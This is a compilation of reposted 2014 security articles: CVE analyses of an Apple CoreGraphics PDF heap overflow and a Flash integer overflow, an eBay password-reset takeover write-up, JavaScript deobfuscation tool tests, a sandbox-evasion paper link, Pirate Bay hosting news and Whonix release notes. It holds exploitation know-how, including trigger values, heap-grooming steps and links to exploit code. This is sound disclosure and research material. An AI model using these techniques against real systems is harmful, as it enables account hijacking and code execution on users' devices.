"There are also, in Romania, bad laws with unconstitutional provisions, adopted by parliamentarians who show excessive zeal in building good-neighborly relations with other state institutions, as well as state institutions that show excessive zeal in criticizing the Constitutional Court for censoring Parliament's excesses of deliberate stupidity. All of this under the cover of a charade about outstanding yet selective results (lately even in an actively negative sense) in the fight against corruption, and under the cover of the by now omnipresent external threat, especially the cyber one, and especially from the Middle East. It would be laughable if it were not sad, because before it was cautious blue it was imagined pink, especially before the friendly Russian spring delicately showed its snowdrops in Odessa. In a word, everything is fine in Romania: the country is safe and will be well protected, cyber-wise, from acts of internal subversion carried out by force, such as the unconstitutional parliamentary putsch of the summer of 2012, a maximum of pink stability under the umbrella of the alliance that has a duty to defend Romania. Sometimes even from itself, isn't that right? And still, in Romania, absolutely nobody has any problem. Good night!"

Sursa: Legea securitatii cibernetice revine pe fast forward
Autor: Bogdan MANOLEA
-
Javascript Deobfuscation Tools Redux
Posted on September 23, 2014 by darryl

Back in 2011, I took a look at several tools used to deobfuscate Javascript. This time around I will use several popular automated and semi-automated/manual tools to see how they would fare against today’s obfuscated scripts with the least amount of intervention.

Here are the tools I’ll be testing:

Automated
- JSUnpack
- Javascript Deobfuscator (Firefox Add-On)
- SpiderMonkey

Semi-Automated/Manual
- JSDetox
- Javascript Debugger (all are similar; using Script Debugger for this test): Microsoft Script Debugger, Chrome Developer Tools, Firefox Developer Tools, Firebug (Firefox Add-On)
- Revelo

Here are the obfuscated scripts:

- Sample 1: Dean Edwards Packer
- Sample 2: HiveLogic Enkoder
- Sample 3: For this sample, I used the same original HTML code as the above and obfuscated it using three online obfuscators in the following order: obfuscatorjavascript.com, www.gaijin.at/en/olsjse.php, www.atasoyweb.net/Javascript_Encrypter/javascript_encrypter_eng.php
- Sample 4: Speed-Trap JS
- Sample 5: Gong Da EK
- Sample 6: RIG EK
- Sample 7: Angler EK
- Sample 8: Nuclear EK

Prelude

My plan is simple: use the tools to try to deobfuscate the above scripts without spending more than a few minutes on each one. If I can’t figure one out by making obvious tweaks along the way, then I move on. To be honest, I’m no expert with all of these tools, so I’m not taking full advantage of their capabilities, but this should give you some idea of what you can expect. I would encourage you to play along (the scripts are here). Be sure you do this in a virtual machine because many of the scripts are real and very malicious.

JSUnpack

JSUnpack is fully automated and can deal with a lot of scripts except the complex ones.

Javascript Deobfuscator

This Firefox add-on is quite robust and also completely automated. Interestingly, it is able to deobfuscate the hard ones but trips up on an easy one.
This tool won’t be able to handle scripts that target Internet Explorer, for obvious reasons. You might be able to comment out some browser-sniffing routines, though.

SpiderMonkey

Using the SpiderMonkey tool is similar to using the Rhino or V8 engines, but Didier Stevens adds some mods that have beefed up SpiderMonkey’s capabilities. DOM-based scripts tend to pose a problem for these engines, but you can make several tweaks to the script and define objects to get around this.

JSDetox

This tool has a lot of capability and potential. The main reason it can’t deob the malicious scripts is probably because I suck at using it.

Javascript Debugger

Pretty much all of the Javascript debuggers work the same way, so I just lumped them together as a single class of tools. Using a debugger can be slow because you have to follow along with the script and know where to place breakpoints, but it is often the most effective way of deobfuscating scripts.

Revelo

I would have hoped my own tool would do pretty well against these scripts, and it did. The main challenge with using Revelo is that you need to understand the script you are working on and be able to recognize entry and exit points to inspect. This tool is definitely not for everyone, but it has the capability to do just as well as a debugger.

Conclusion and Scorecard

As I mentioned earlier, I’m probably not making the most of every tool, as they are quite capable and powerful in their own right. The end result is probably more of a reflection of my abilities rather than the tools, so take this with a barrel of salt.

Sursa: Javascript Deobfuscation Tools Redux | Kahu Security
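None of this is from the article itself, but as a toy illustration of what these tools are automating: many obfuscators simply stack reversible string transforms (percent-escaping, reversal, charCode arrays) in front of an eval. A minimal Python sketch of one such layer and its inverse (the obfuscation scheme here is invented for the example):

```python
from urllib.parse import unquote

def obfuscate(s: str) -> str:
    # Percent-encode every character, then reverse the whole string.
    return ''.join('%%%02x' % ord(c) for c in s)[::-1]

def deobfuscate(payload: str) -> str:
    # Undo in reverse order: un-reverse, then percent-decode.
    return unquote(payload[::-1])

hidden = obfuscate('alert("pwned");')
print(hidden)               # unreadable without knowing the decoder
print(deobfuscate(hidden))  # alert("pwned");
```

Real samples chain several such layers and mix in environment checks, which is exactly why the automated tools above stumble on the harder exploit-kit scripts.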
-
CoreGraphics Memory Corruption - CVE-2014-4377

Apple's CoreGraphics library fails to validate its input when parsing the colorspace specification of a PDF XObject, resulting in a heap overflow condition. A small heap memory allocation can be overflowed with controlled data from the input in any application linked with the affected framework. Using a crafted PDF file as an HTML image, combined with an information-leakage vulnerability, this issue leads to arbitrary code execution. A complete, 100% reliable and portable exploit for MobileSafari on iOS 7.1.x can be downloaded from github.

Summary
- Title: Apple CoreGraphics Memory Corruption
- CVE Name: CVE-2014-4377
- Permalink: Binamuse Blog: CoreGraphics Memory Corruption - CVE-2014-4377
- Date published: 2014-09-18
- Date of last update: 2014-09-19
- Class: Client side / Integer Overflow / Memory Corruption
- Advisory: HT6441 HT6443

Vulnerability Details

Safari accepts PDF files as a native image format for the <img> HTML tag. Thus, browsing an HTML page in Safari can transparently load multiple PDF files without any further user interaction. CoreGraphics is responsible for parsing the PDF files. The Core Graphics framework fails to validate the input when parsing the colorspace specification of a PDF XObject. A small heap memory allocation can be overflowed with controlled data from the input, enabling arbitrary code execution in the context of Mobile Safari (a memory-layout information leak is needed).

The Core Graphics framework is a C-based API that is based on the Quartz advanced drawing engine. It provides low-level, lightweight 2D rendering. It is used in a wide range of applications to handle path-based drawing, transformations, color management, offscreen rendering, patterns, gradients and shadings, image data management, image creation, masking, and PDF document creation, display, and parsing.
The CoreGraphics library implements the functionality to load and save several graphic formats such as PDF, and it is used by most common applications that deal with images, including Safari, Preview, Skype, etc. The 32-bit version of the framework also implements the x_alloc heap, a set of low-level procedures to manage an internal heap memory structure used when processing images of different types (including PDF files). The functions x_calloc and x_free are used very frequently to allocate and de-allocate memory fast.

The x_calloc function behaves like a normal calloc except that it allocates a bit of extra memory for metadata. It actually allocates an extra 2*sizeof(void*) bytes and pads the resulting size to the next 16-byte border. When the chunk is in use (allocated), this extra space holds the size of the chunk, making it very fast to free. When the chunk is free, the metadata space is used to form a free-list linked list: the first metadata value in a free chunk points to the next free chunk. This is its pseudocode (think of x_mem_alloc0_size as a plain malloc):

void* __cdecl x_calloc(size_t nmemb, size_t size)
{
    void *buffer = x_mem_alloc0_size((nmemb * size + 31) & -16);
    *(size_t *)buffer = (nmemb * size + 31) & -16;
    return buffer + 16;
}

This function is prone to integer overflow because it doesn't check that (nmemb * size) is less than MAXUINT-16. So if a programmer tries to allocate a size in the range [-16,-1], x_alloc will allocate 0 (zero) or 16 bytes (instead of the immense value required) without triggering any exception.

An x_calloc bug

There is an x_calloc-related bug in how the PDF code handles the colorspace of embedded XObjects. Forms and images of different types can be embedded in a PDF file using an XObject pdf stream. As described in the PDF specification, an XObject can specify the colorspace in which the intended image is described.
The CoreGraphics library fails to validate the input when parsing the /Indexed colorspace definition of an XObject pdf stream, which enables an attacker to reach x_calloc with a size in the [-16,-1] range. The indexed colorspace definition is table based and relies on a base colorspace. For example, the following definition defines an indexed colorspace of 200 colors based on an RGB base colorspace, with the table defined in the indirect object 8 0 R. For more info on indexed colorspaces see section 8.6.6.3 of the PDF specification.

/ColorSpace [/indexed /DeviceRGB 200 8 0 R]

The following is an excerpt of the function _cg_build_colorspace. It was taken from the dyld_shared_cache_armv7 of the iPhone3,1 (iPhone4), iOS version 7.1.1. The function can be disassembled at address 0x2D59F260, considering that the dyld_shared_cache is loaded at 0x2C000000.

/* cs_index_array should represent something like this:
   [/indexed /DeviceRGB 200 8 0 R] */

/* Sanity check, array must have 4 elements */
if ( CGPDFArrayGetCount(cs_index_array) != 4 )
{
    message = "invalid `Indexed' color space: incorrect number of entries in color space array.";
    goto EXIT;
}

/* Sanity check, 2nd element should be an object */
if ( !CGPDFArrayGetObject(cs_index_array, 1, &base_cs_obj) )
{
    message = "invalid `Indexed' color space: second color space array entry is not an object.";
    goto EXIT;
}

/* build the base colorspace */
base_cs = cg_build_colorspace(base_cs_obj);
if ( !base_cs )
{
    message = "invalid `Indexed' color space: invalid base color space.";
    goto EXIT;
}

/* get the 3rd element: N, the number of indexed colors in the table */
if ( !CGPDFArrayGetInteger(cs_index_array, 2, &N) )
{
    message = "invalid `Indexed' color space: high value entry is not an integer.";
    goto RELEASE_EXIT;
}

/* Sanity check. N should be positive */
if ( N <= -1 )
{
    message = "invalid `Indexed' color space: high value entry is negative.";
    goto RELEASE_EXIT;
}

/* cs is the resultant colorspace, init to NULL */
cs = 0;

/* if the 4th element is a pdf stream, get it and do stuff ... */
if ( CGPDFArrayGetStream(cs_index_array, 3, &lookup_stream) == 1 )
{
    lookup_buffer = CGPDFStreamCopyData(lookup_stream);
    if ( lookup_buffer )
    {
        lookup_size = (N + 1) * CGColorSpaceGetNumberOfComponents(base_cs);
        if ( CFDataGetLength(lookup_buffer) >= lookup_size )
        {
            data = CFDataGetBytePtr(lookup_buffer);
            cs = CGColorSpaceCreateIndexed(base_cs, N_, data);
        }
        else
        {
            /* HERE is the interesting bit. A lookup_size in the [-16,-1] range
               will silently allocate a very small buffer */
            overflow_buffer = x_calloc_2D5143B4(1, lookup_size);
            _data = CFDataGetBytePtr(lookup_buffer);
            _size = CFDataGetLength(lookup_buffer);
            /* But memmove will copy all the available data in the stream. OVERFLOW!! */
            memmove(overflow_buffer, _data, _size);
            /* CGColorSpaceCreateIndexed is a nop when N is greater than 256 */
            cs = CGColorSpaceCreateIndexed(base_cs, N_, overflow_buffer);
            if ( overflow_buffer )
                x_free(overflow_buffer);
        }
        CFRelease(lookup_buffer);
    }
    goto RELEASEANDEXIT;
}

/* else if the 4th element is a pdf string, get it and do stuff ... */
if ( CGPDFArrayGetString(cs_index_array, 3, &lookup_str) == 1 )
{
    lookup_size_ = (N + 1) * CGColorSpaceGetNumberOfComponents(base_cs);
    if ( lookup_size_ != CGPDFStringGetLength(lookup_str) )
    {
        message = "invalid `Indexed' color space: invalid lookup entry.";
        goto RELEASEANDEXIT;
    }
    buffer = CGPDFStringGetBytePtr(lookup_str);
    cs = CGColorSpaceCreateIndexed(base_cs, N__, buffer);
    goto RELEASEANDEXIT;
}

/* at this point cs is NULL */
message = "invalid `Indexed' color space: lookup entry is not a stream or a string.";

RELEASE_EXIT:
    CGColorSpaceRelease(base_cs);
EXIT:
    log_2D5A0DA8(message);
/* result in cs */

CGPDFArrayGetInteger gets an object from an arbitrary position in a pdf array, starting at 0.
The number of indexed colors is read from the third array position (index 2), multiplied by the number of color components of the base colorspace, and then (if using a pdf stream) allocated with x_calloc. We basically control the size passed to x_calloc. If the resultant value is, for instance, -10, x_calloc will allocate a small amount of memory and return a valid pointer. If the inner colorspace is /DeviceRGB with 3 color components, passing a value of 0x55555555 will do the trick. Then the memmove will potentially overflow the small buffer with an arbitrary number of arbitrary bytes. The function CGColorSpaceCreateIndexed can be considered a no-op, as it will use this buffer only if our controlled size is a positive value less than 0xff, which is not the interesting case.

Exploitation

A 100% reliable PoC exploit can be downloaded from the github project. This exploit needs a companion information-leakage vulnerability to bypass the ASLR, DEP and code-signing iOS exploit mitigations. The exploit is presented as a cgi script that expects to get the dyld_shared_cache address, the shellcode address and the iOS version as GET parameters. It executes arbitrary code in the context of SafariMobile.

Exploit: https://github.com/feliam/CVE-2014-4377
Blog post: Binamuse Blog: CoreGraphics Memory Corruption - CVE-2014-4377
Info: iOS 7_1 exploit for CVE-2014-4377 flaw publicly available | Security Affairs
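The 32-bit arithmetic described above can be sanity-checked outside of CoreGraphics. A small sketch (Python standing in for 32-bit C math; the rounding expression is the one from the x_calloc pseudocode, everything else is just illustration):

```python
MASK32 = 0xFFFFFFFF

def lookup_size(n: int, components: int) -> int:
    """(N + 1) * numComponents, as computed in 32-bit registers."""
    return ((n + 1) * components) & MASK32

def x_calloc_rounded_size(nmemb: int, size: int) -> int:
    """Bytes actually reserved by x_calloc: (nmemb*size + 31) & -16, in 32 bits."""
    return ((nmemb * size + 31) & MASK32) & 0xFFFFFFF0

# /Indexed over /DeviceRGB (3 components) with N = 0x55555555:
size = lookup_size(0x55555555, 3)
print(hex(size))                       # 0x2 -- the multiply wrapped around 2**32
print(x_calloc_rounded_size(1, size))  # 32  -- a tiny allocation

# A size in the [-16,-1] range (e.g. from N = 0x55555551) rounds down to 16 bytes:
print(x_calloc_rounded_size(1, 0xFFFFFFF6))  # 16
```

Either way, the allocation is a handful of bytes while the attacker-supplied stream copied by memmove can be megabytes long.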
-
Today I am going to share an interesting finding that allowed me to change the password of almost 150 million eBay users!

I was checking my e-mail when I found a "View your recent activity" message from PayPal. I checked the links inside the message and found an "Open Redirection" vulnerability! I decided to report it to PayPal, so I asked a friend of mine about the PayPal security e-mail; he told me that I should register on eBay to report vulnerabilities to PayPal. Well, I went to eBay to register and found two other vulnerabilities while registering! I reported the three bugs and waited.

Two days later, I tried to log in to my eBay account to check the status of my 3 reports and, like every time, I had forgotten my password. I went to the "Forgot Password" page at eBay to see how secure their password reset mechanism is. So here is how users can change their own passwords on eBay:

1. The user navigates to the "Forgot password" page and enters his registered e-mail or username.
2. eBay offers three options for changing the password (e-mail, text message or phone call).
3. If you use the e-mail method, they will send you an e-mail that includes a reset-password link where you can change your own password.

So let's fire up Burp Suite to see what happens behind the scenes. Visiting (https://fyp.ebay.com/EnterUserInfo?&clientapptype=19) and entering my e-mail address took me to another page that asks where I want to get my reset-password link. I chose "By E-mail" and intercepted the request.

[Screenshot: Hijacking eBay users]

After forwarding that request, I received an e-mail with a change-password link. I clicked on the link, and it took me to another page where I had to create my new password. I entered my new password, hit enter and intercepted the request, which looked like:

[Screenshot: Hijacking eBay users]

Have you noticed that??!!
Wow, instead of using the secret "reqinput" value that was sent to the user's e-mail, eBay uses the same "reqinput" value that was generated in the first request!!!

Exploitation time:

I went again to the "Forgot Password" page, entered the victim's e-mail, chose to send the reset-password link by e-mail, captured the request and saved the "reqinput" value. Then I repeated the POST request (shown in the last screenshot), replaced the reqinput value with the new one and posted it, but it gave me an error!! Why? Because the user has to click on the link sent to the e-mail so the server can unlock the change-password process, and this is the only user interaction required for the attack to succeed. After the user clicked on the "reset password" link, I was able to change his password.

This means that an attacker can hijack millions of user accounts in a targeted attack. Here is a real-life attack scenario diagram:

[Diagram: eBay hacked]

Enjoy watching the POC video.

Sursa: Yasser Ali's Blog » How I could change your eBay password
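The flaw boils down to the server validating the token the requester already holds instead of the secret that was e-mailed to the account owner. A toy server-side sketch of the broken check versus the correct one (all names invented for illustration; this is not eBay's actual code):

```python
import secrets

class ResetFlow:
    """Toy model of a password-reset flow with an eBay-style token mix-up."""
    def __init__(self):
        self.session_token = secrets.token_hex(8)  # echoed back to the browser (attacker sees it)
        self.email_token = secrets.token_hex(8)    # sent only to the victim's inbox
        self.link_clicked = False                  # set when the victim opens the e-mailed link

    def change_password_broken(self, supplied_token: str) -> bool:
        # BUG: compares against the value the requester was already given.
        return self.link_clicked and supplied_token == self.session_token

    def change_password_fixed(self, supplied_token: str) -> bool:
        # FIX: only the secret from the victim's inbox may authorize the change.
        return self.link_clicked and supplied_token == self.email_token

flow = ResetFlow()
flow.link_clicked = True  # the victim clicks the legitimate link
print(flow.change_password_broken(flow.session_token))  # True: attacker wins
print(flow.change_password_fixed(flow.session_token))   # False: only the e-mailed secret works
```

The one-line fix (binding the final POST to the e-mailed secret) is exactly what removes the attacker from the flow, since the session token is the only value visible in Burp.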
-
Breaking the Sandbox
Author: Sudeep Singh

Introduction

In this paper, I would like to discuss various existing and interesting techniques which are used to evade the detection of a virus in a sandbox. We will also look at ways a sandbox can be hardened to prevent such evasion techniques. This paper is targeted at those who have experience with Windows OS internals and reverse engineering viruses, as well as those who are interested in developing detection mechanisms for viruses in a sandboxed environment. A deep understanding of the evasion techniques used by viruses in the wild helps us implement better detection mechanisms.

Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/34591.pdf
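The paper itself covers Windows-specific techniques; as a generic taste of the category (not taken from the paper), one well-known class of evasion checks simply looks for the under-provisioned hardware typical of analysis VMs:

```python
import os

def looks_like_sandbox(min_cores: int = 2, min_ram_gb: float = 2.0) -> bool:
    """Heuristic used by some malware: analysis sandboxes are often
    configured with a single CPU core and very little RAM."""
    cores = os.cpu_count() or 1
    try:
        ram_gb = os.sysconf("SC_PAGE_SIZE") * os.sysconf("SC_PHYS_PAGES") / 2**30
    except (ValueError, OSError, AttributeError):
        ram_gb = float("inf")  # cannot tell; assume a real machine
    return cores < min_cores or ram_gb < min_ram_gb

# A sample that wants to evade analysis would simply go dormant:
if looks_like_sandbox():
    pass  # sleep, exit, or show only benign behaviour
```

The hardening countermeasure is the mirror image: give the sandbox realistic core counts, RAM sizes and uptime so these cheap checks return nothing suspicious.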
-
The Pirate Bay Runs on 21 "Raid-Proof" Virtual Machines To Avoid Detection
Tuesday, September 23, 2014 Mohit Kumar

The Pirate Bay is the world's largest torrent tracker site, handling requests from millions of users every day, and is among the top 100 most visited websites on the Internet. The Pirate Bay is best known for hosting potentially illegal content on its website, and despite years of persecution it continues to disobey copyright laws worldwide. Both founders of The Pirate Bay (TPB) file-exchange service were arrested by the authorities and are in prison, yet their notorious pirated-content exchange continues to receive millions of unique visitors daily. That's really strange!! But how??

Recently, The Pirate Bay team revealed how cloud technology made its service's virtual servers truly secure against police raids and detection. It doesn't own any physical servers; The Pirate Bay runs on "virtual machines" hosted by a few commercial cloud hosting services, which don't even know whom they are dealing with.

According to a TorrentFreak report, at present The Pirate Bay has 21 virtual machines (VMs) hosted around the globe at different cloud providers. The cloud technology eliminated the need for any crucial pieces of hardware, thus saving costs, guaranteeing better uptime and making the site more portable, and therefore harder to take down.

The Pirate Bay operates using 182 GB of RAM and 94 GPU cores, with a total storage capacity of 620 GB, which is actually not used in full. Of the 21 VMs, eight are used to serve web pages, six are dedicated to handling searches, two currently run the site's database, and the remaining five virtual machines are used for load balancing, statistics, the proxy site on port 80, torrent storage and the controller.
Interestingly, the commercial cloud hosting providers have no idea that The Pirate Bay is using their services, because all traffic goes through the load balancer, which masks the activities of the other virtual machines from the cloud providers. This clearly means that none of the IP addresses of the cloud hosting providers are publicly linked to The Pirate Bay, which should keep them safe.

Should police close down some of these cloud servers, it is always possible to move the VMs to another location in a relatively short time. Back in 2006 in Sweden, police raided The Pirate Bay's hosting company, seizing everything from blank CDs to fax machines and servers, taking down the site; even then, it took just three days for the site to return to its normal state.

Sursa: The Pirate Bay Runs on 21 "Raid-Proof" Virtual Machines To Avoids Detection
-
Exploiting CVE-2014-0556 in Flash
Posted by Chris Evans, Kidnapper of RIP

A couple of weeks ago, Adobe released security bulletin APSB14-21, including 8 fixes for bugs reported by Project Zero. Full details of these bugs are now public in our bug tracker. Some of the more interesting ones are a double free in the RTMP protocol, or an integer overflow concatenating strings. Again, we’d like to thank Adobe for a response time well ahead of our standard 90-day disclosure deadline. The focus of this post is an integer overflow leading to a buffer overflow in an ActionScript API.

Prelude

Before we get started, though, it’s worth briefly noting why there is so much value in writing an exploit. Finding and eliminating bugs obviously improves software correctness, but writing exploits is always a significant learning opportunity. Throughout the history of the security industry, there’s a long track record of offense driving defense, leading to technologies such as stack canaries, NX support in processors and ASLR. Project Zero is not just a bug hunting initiative. We’re doing our part to continue the tradition of practical and public research of exploitation techniques -- and deriving defenses from them. For example, our glibc defensive patch was accepted as a follow-on from our glibc exploit.

The case of this particular exploit starts with some irony, on account of my overly hasty initial triage of the bug based on instincts which were later proved wrong by a more in-depth analysis of exploitation opportunities. In the bug history, you can see the claim “almost certainly 64-bit only” (wrong!) and then “does not work in Chrome 64-bit Linux”. We learned not to declare anything as unexploitable in our previous post about exploiting a subtle condition in glibc. Therefore, I had to declare shenanigans on myself and tackle the challenge: exploit this bug on Chrome 64-bit Linux.
The bug

The bug is triggered by calling BitmapData.copyPixelsToByteArray() with a reference to a ByteArray that has its position property set very large -- close to 2^32. This results in an integer overflow in 32-bit arithmetic. This occurs even on 64-bit because the relevant position and length variables are (quite reasonably) stored in 32-bit variables. The code then believes that it can copy the pixels, starting to write them at position, and stay within the bounds of the buffer. Instead, a buffer overflow occurs. On 32-bit, the out-of-bounds write will be written before the start of the buffer because the pointer will wrap. On 64-bit, things are not as kind to the attacker. On a typical 64-bit Linux process setup with a 1MB buffer, the situation will look like this:

… | buffer: 1MB | heap, libs, binary | !!

The out-of-bounds write (marked !!) is at approximately buffer + 4GB. This will not wrap around the massive 64-bit address space, leading to a write way off in unmapped space. Insta-crash. The most obvious way to avoid the crash is to make the buffer massive, almost 4GB, leading to this situation:

… | buffer: 4GB | !! heap, libs, binary |

This is readily exploitable. However, 64-bit Chrome on Linux has a defensive measure where the amount of mapped address space is limited to 4GB. So the large buffer allocation will fail and prevent that particular attack.

The heap groom

We’re going to need a trick to exploit this without slamming into the 4GB address space limit. The breakthrough -- that did not occur to me before attempting to develop an exploit -- comes when we realize that we don’t need to have the address space contiguously mapped. The out-of-bounds write will happily still go ahead even if it “jumps over” a hole in the address space. By having a hole in the address space, perhaps we can usefully trigger the corruption with less than 4GB mapped. But how do we put this hole where we want it?
Looking at how the Flash allocator works using the strace system tool, we see that very large allocations are serviced using unhinted mmap(). The standard Linux algorithm for servicing unhinted mmap() calls is to stack them adjacently and downwards in address space, as long as there isn’t a hole that can satisfy the request. So let’s see what happens when we allocate two 1GB chunks:

… | buffer2: 1GB | buffer1: 1GB | heap, libs, binary |

And then free the first one (a direct munmap() call is seen):

… | buffer2: 1GB | 1GB hole | heap, libs, binary |

And then allocate a 2GB buffer (too big to fit in the hole):

… | buffer3: 2GB | buffer2: 1GB | 1GB hole | !! heap, libs, binary |

Aha! We’ve managed to engineer a situation where we’ve never had more than 4GB of address space mapped at any given moment, and at the end, a corruption at buffer3 + 4GB will land right in a writable region: the heap.

The corruption target

Now that we have a reasonably controlled memory corruption situation, we need to pick something to corrupt. As is pretty standard in modern heap buffer overflow exploitation in a scripting environment, we’re going to try and clobber the length of an array-like object. If we clobber any such length to be larger, we will then be able to read and write arbitrary relative heap memory. Once we’ve achieved such a powerful primitive, it’s essentially game over. Successful exploitation is pretty much assured: defeat ASLR by reading the value of a vtable, and then write a new vtable that causes execution redirection to a sequence of opcodes that we choose.

We decide to corrupt a Vector.<uint> buffer object. This is a fairly standard, documented technique. I recommend Haifei Li’s excellent paper as background reading.
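The mmap() grooming sequence above can be modeled with a toy top-down allocator. This is a sketch of the placement logic only; the base address is illustrative, and real mappings are handled by the kernel, not by code like this:

```python
GB = 1 << 30
TOP = 0x7F0000000000  # illustrative: heap, libs and binary live at/above here

class TopDownAllocator:
    """Toy model of Linux's unhinted-mmap placement: a new mapping reuses a
    freed hole if one is big enough, otherwise it stacks downward below the
    lowest existing mapping."""
    def __init__(self, top):
        self.top = top
        self.mapped = []   # list of (base, size)
        self.holes = []    # list of (base, size)
        self.peak = 0      # most address space mapped at any one time

    def alloc(self, size):
        for i, (hbase, hsize) in enumerate(self.holes):
            if hsize >= size:
                # Carve the request out of the hole.
                if hsize > size:
                    self.holes[i] = (hbase + size, hsize - size)
                else:
                    self.holes.pop(i)
                self.mapped.append((hbase, size))
                self._track()
                return hbase
        base = (min(b for b, s in self.mapped) if self.mapped else self.top) - size
        self.mapped.append((base, size))
        self._track()
        return base

    def free(self, base):
        for i, (b, s) in enumerate(self.mapped):
            if b == base:
                self.mapped.pop(i)
                self.holes.append((b, s))
                return
        raise ValueError("not mapped")

    def _track(self):
        self.peak = max(self.peak, sum(s for _, s in self.mapped))

vm = TopDownAllocator(TOP)
buffer1 = vm.alloc(1 * GB)
buffer2 = vm.alloc(1 * GB)
vm.free(buffer1)            # leaves a 1 GB hole just below heap/libs/binary
buffer3 = vm.alloc(2 * GB)  # too big for the hole, so it stacks below buffer2

write_at = buffer3 + 4 * GB  # where the overflowed write lands
print(hex(buffer3), hex(write_at), vm.peak // GB)
```

In this model, buffer3 + 4GB lands exactly at the top of the groomed region (the writable heap area), and no more than 3GB is ever mapped at once, which stays under Chrome's 4GB limit.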
This buffer object is an obvious corruption target because of three properties it possesses:

- The attacker can choose arbitrary sizes for these objects, meaning there is a lot of control over where in the heap they are placed relative to the pending heap corruption.
- The object starts with a length field, and corrupting it results in arbitrary heap-relative read/write being exposed to script.
- The object is resilient to corruption in general. Aside from the length field, there is just a single pointer, and trashing this pointer does not affect the ability to use the Vector, or otherwise cause noticeable stability issues during the course of exploitation. (We could even restore its value post-exploitation if we wished.)

To proceed, we simply create many (32) Vector.<uint> objects, all with buffers sized at about 2MB. These typically end up being stacked downwards at the top of the 1GB hole. In reality, the 1GB and 2GB allocations end up being a little larger than expected under the covers. This means that the corruption address of buffer3 + 4GB actually ends up corrupting objects within the 1GB hole instead of after it. This is ideal, because we can make sure that only our large buffers are corrupted.

In terms of the actual data to write, we just use the default values in an empty BitmapData, which are 0xffffffff (white pixels with a full alpha channel). 0xffffffff is a plenty large enough length to proceed with the exploit!

Proceeding onwards

There is nothing particularly exciting or unique about how the exploit proceeds to demonstrate code execution, so we’ll skip the lengthy explanation here. I’ve made an attempt to fully comment the exploit source code, so if you want to continue to follow along I recommend you read the materials attached to the public bug. The only part I’d flag as mildly interesting -- because it differs from the previously quoted paper -- is how we get known data at a known heap address. We do it with a Vector.<uint> object again.
Each of these is in fact a pair of objects: a script object, which is fixed-size and contains metadata; and the buffer object, which contains the arbitrary data prefixed by the length. The script object forms a distinct pattern in memory and also contains a pointer to the buffer object. By locating any Vector.<uint> script object, we can then use a raw memory edit to change a property of the object. This property change will be visible to ActionScript, so we then know which handle corresponds to a buffer at which raw address.

Conclusions, and turning what we’ve learned into generic defenses

Various technologies would have changed the exploitation landscape here, and can now be investigated in more detail:

- Randomized placement of large memory chunks. Non-deterministic placement of large allocations would have broken the heap-grooming aspect of the exploit.
- Isolation of Vector.<uint> buffers. As we’ve seen, corruption of these buffers is an extremely dangerous condition. Some of the most recent advances in memory corruption defenses have been “isolated” or “partitioned” heaps. These technologies seem applicable here. (They would need to be applied not just to the Vector buffers, but to the general case: partitioning off read/write objects where the attacker controls both the size and the content.)

Given the open-source nature of the ActionScript engine, and the open-source nature of some potentially helpful technologies, a prototype of a generic defense is now on the Project Zero TODO list!

Sursa: Project Zero: Exploiting CVE-2014-0556 in Flash
-
Whonix Anonymous Operating System Version 9 Released!

Posted on September 19, 2014 by Patrick Schleizer

Whonix is an operating system focused on anonymity, privacy and security. It’s based on the Tor anonymity network, Debian GNU/Linux and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user’s real IP.

Whonix consists of two parts: one solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible.

Download Whonix for VirtualBox
https://www.whonix.org/wiki/Download

Download Whonix for KVM / QEMU / Qubes
This is only useful if you have a tester's mindset!
Instructions for KVM: https://www.whonix.org/wiki/KVM
Instructions for QEMU: https://www.whonix.org/wiki/QEMU
Instructions for Qubes: https://www.whonix.org/wiki/Qubes

Call for Help
– If you know shell scripting (/bin/bash) and Linux sysadmin work, please join us! There are plenty of ways to make Whonix safer.
– We are also looking for download mirrors.
– For https://www.whonix.org we need some help with CSS, HTML, MediaWiki, WordPress and web design.
– Contribute: https://www.whonix.org/wiki/Contribute
– Donate: https://www.whonix.org/wiki/Donate

If you want to upgrade an existing Whonix version using Whonix’s APT repository
Upgrading Whonix 8 to Whonix 9:
– You cannot upgrade using apt-get dist-upgrade or you will break the packaging system!
– You can upgrade using these instructions: https://www.whonix.org/wiki/Upgrading_Whonix_8_to_Whonix_9

If you want to upgrade an existing Whonix version from source code
See https://www.whonix.org/wiki/Dev/BuildDocumentation.

If you want to build images from source code
See https://www.whonix.org/wiki/Dev/BuildDocumentation.

Physical isolation users
See https://www.whonix.org/wiki/Dev/Build_Documentation/Physical_Isolation.
Changelog between Whonix 8 and Whonix 9

– Modding Whonix, extending Whonix, such as installing a different desktop environment, is now much simpler, because Whonix has been split into smaller packages: https://github.com/Whonix/Whonix/issues/40. Therefore, understanding Whonix internals also got simpler.
– added testers-only libvirt (kvm, qemu) support
– providing xz archives with sparse .qcow2 images
– added experimental Qubes support
– A new feature for VPN lovers has been added: VPNs can now also be easily installed on Whonix-Gateway. Previously, many VPN users who wanted to route Tor through a VPN (user -> VPN -> Tor) preferred to install VPNs on the host and had little other choice, some in conjunction with VPN-Firewall, to avoid connecting without the VPN if the VPN (software) breaks down. Physical isolation users could not easily use a VPN on Whonix-Gateway and naturally had no host. VPN-Firewall features have been added to Whonix-Gateway’s firewall. network-manager-kde and OpenVPN are now installed by default to aid users who want to hide Tor and Whonix from their ISP.
– Lots of AppArmor profiles are now installed from Whonix’s APT Repository, thanks to troubadoour for creating them!
– fixed Tor restart bug when updated by apt-get
– updated Debian packages including Heartbleed OpenSSL bug fix
– VirtualBox version: no longer recommending to use VirtualBox’s snapshot feature in VirtualBox’s VM import text, due to a data loss bug in VirtualBox
– Breaking change: Changed Whonix-Gateway internal IP address to 10.152.152.10 and netmask to 255.255.192.0 to avoid conflicts, such as with real networks when using physical isolation, and to aid KVM users.
– Breaking change: Changed Whonix-Workstation internal IP address to 10.152.152.11, netmask to 255.255.192.0 and gateway to 10.152.152.10 to avoid conflicts, such as with real networks when using physical isolation, and to aid KVM users.
– use logrotate for bootclockrandomization, sdwdate, control-port-filter, timesanitycheck
– fixed timezone question during upgrade for Whonix build version 9 and above
– encrypt swapfile on boot with random password, create swap file on boot using init script instead of postinst script (package: swap-file-creator)
– Whonix-Gateway firewall: reject invalid outgoing packets
– added spice-vdagent to anon-shared-packages-recommended for better kvm support
– ram adjusted desktop starter (package: rads): fixed lightdm (/usr/sbin/…) auto detection
– Physical Isolation: automated ‘Install Basic Packages’ (‘sudo apt-get install $(grep -vE “^\s*#” grml_packages | tr “\n” ” “)’) build step
